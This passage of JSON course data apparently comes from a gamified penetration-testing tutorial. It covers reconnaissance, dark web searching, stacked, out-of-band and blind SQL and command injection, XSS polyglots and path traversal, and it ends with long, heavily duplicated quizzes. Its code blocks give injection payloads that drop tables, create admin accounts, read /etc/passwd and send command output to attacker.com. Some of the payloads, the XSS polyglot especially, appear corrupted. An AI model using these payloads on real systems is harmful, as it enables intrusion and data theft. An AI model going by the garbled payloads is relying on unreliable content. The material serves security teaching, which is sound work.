'https://crt.sh/?q=%25.target.com&output=json' | jq '.[] | select(.not_before > \"2024-01-01\") | .name_value'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"CT monitoring reveals...","opts":["Vulnerabilities","New subdomains and services as soon as they get a certificate","Passwords","Network topology"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-darkweb-monitoring","cat":"Reconnaissance","title":"Dark Web Monitoring","diff":4,"xp":250,"intro":"Monitor dark web forums and markets for target mentions.","sections":[{"type":"text","content":"Dark web forums contain: data breach announcements, initial access broker listings, zero-day sales, and insider threat discussions."},{"type":"code","lang":"bash","content":"# Tor access\ntorsocks curl http://darkforum.onion/search?q=target.com\n# Clearnet dark web indexes\n# IntelX: intelx.io\n# SpiderFoot dark web modules\nspiderfoot -s target.com -m sfp_darksearch,sfp_ahmia"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Dark web monitoring helps find...","opts":["Vulnerabilities","Stolen data, compromised credentials, and planned attacks","Server locations","DNS records"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-empire-state-recon","cat":"Reconnaissance","title":"Enterprise-Scale Reconnaissance","diff":5,"xp":300,"intro":"Coordinate recon across a large organization with multiple subsidiaries.","sections":[{"type":"text","content":"Large enterprises have hundreds of domains, multiple cloud providers, acquisitions with separate infrastructure, and global offices. Coordinate recon across all of them."},{"type":"code","lang":"bash","content":"# Enterprise recon workflow:\n# 1. Map the corporate structure (acquisitions, subsidiaries)\n# 2. Discover all domains per entity (reverse WHOIS)\n# 3. Enumerate cloud assets per entity\n# 4. Run automated OSINT (SpiderFoot) per entity\n# 5. Correlate and deduplicate findings\n# 6. Prioritize by: internet-facing + high-value + vulnerable"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Enterprise recon must account for...","opts":["Only the main domain","Subsidiaries, acquisitions, and separate infrastructure","Only cloud assets","Only internal networks"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"w-sqli-stacked","cat":"Web Application","title":"Stacked SQL Queries","diff":3,"xp":200,"intro":"Execute multiple SQL statements in one injection.","sections":[{"type":"text","content":"Stacked queries use semicolons to chain SQL statements: SELECT; INSERT; UPDATE; DROP. Not all databases support them through all drivers."},{"type":"code","lang":"bash","content":"?id=1; DROP TABLE users--\n?id=1; INSERT INTO users(name,pass) VALUES('hacker','pass')--\n?id=1; UPDATE users SET role='admin' WHERE name='hacker'--"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Stacked queries use...","opts":["UNION","Semicolons to chain multiple SQL statements","Subqueries","Joins"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-sqli-out-of-band","cat":"Web Application","title":"Out-of-Band SQL Injection","diff":4,"xp":250,"intro":"Exfiltrate data via DNS or HTTP when no direct output channel exists.","sections":[{"type":"text","content":"When you can't see results inline or measure timing, make the database resolve a DNS name or send HTTP requests containing the data."},{"type":"code","lang":"bash","content":"# MySQL DNS exfil\n?id=1 AND LOAD_FILE(CONCAT('',version(),'.attacker.com\\share'))--\n# MSSQL HTTP exfil\n?id=1; EXEC master..xp_dirtree '\\\\\\attacker.com\\share'--\n# Oracle DNS exfil\n?id=1 AND UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual))--"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Out-of-band SQLi sends data via...","opts":["Page content","DNS or HTTP requests to an attacker server","Error messages","Timing"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-xss-polyglot","cat":"Web Application","title":"XSS Polyglot Payloads","diff":3,"xp":200,"intro":"Single payloads that work across multiple injection contexts.","sections":[{"type":"text","content":"A polyglot XSS payload breaks out of strings, attributes, scripts, and HTML contexts simultaneously."},{"type":"code","lang":"bash","content":"jaVasCript:/*-/*`/*`/*'/*\"/**/(/* */oNcliCk=alert() )//%%0telerik0telerik11telerik//oNcliCk=alert()//>\"><svg/onload=alert()//"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"XSS polyglots work across...","opts":["One specific context","Multiple injection contexts simultaneously","Only JavaScript","Only HTML"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-command-injection-blind","cat":"Web Application","title":"Blind Command Injection","diff":2,"xp":150,"intro":"Detect command injection when output isn't displayed.","sections":[{"type":"text","content":"When you can't see command output, use time delays (sleep), DNS lookups (nslookup), or HTTP callbacks (curl) to confirm injection."},{"type":"code","lang":"bash","content":"# Time-based\n?ip=127.0.0.1; sleep 5\n?ip=127.0.0.1 | sleep 5\n# DNS callback\n?ip=127.0.0.1; nslookup $(whoami).attacker.com\n# HTTP callback\n?ip=127.0.0.1; curl http://attacker.com/$(id|base64)"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Blind command injection is confirmed via...","opts":["Page content","Time delays, DNS lookups, or HTTP callbacks","Error messages","Status codes"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-path-traversal-advanced","cat":"Web Application","title":"Advanced Path Traversal","diff":3,"xp":200,"intro":"Bypass path traversal filters with encoding and alternative sequences.","sections":[{"type":"text","content":"Filters blocking ../ can be bypassed with: double encoding (%252e%252e%252f), Unicode (%c0%ae%c0%ae/), null bytes, and OS-specific paths."},{"type":"code","lang":"bash","content":"# URL encoding\ncurl 'http://target.com/?f=%2e%2e%2f%2e%2e%2fetc%2fpasswd'\n# Double encoding\ncurl 'http://target.com/?f=%252e%252e%252f%252e%252e%252fetc%252fpasswd'\n# Null byte (old PHP)\ncurl 'http://target.com/?f=../../../etc/passwd%00.jpg'"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Double URL encoding bypasses filters that...","opts":["Block all requests","Decode input only once","Use encryption","Block all periods"],"ans":1},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The 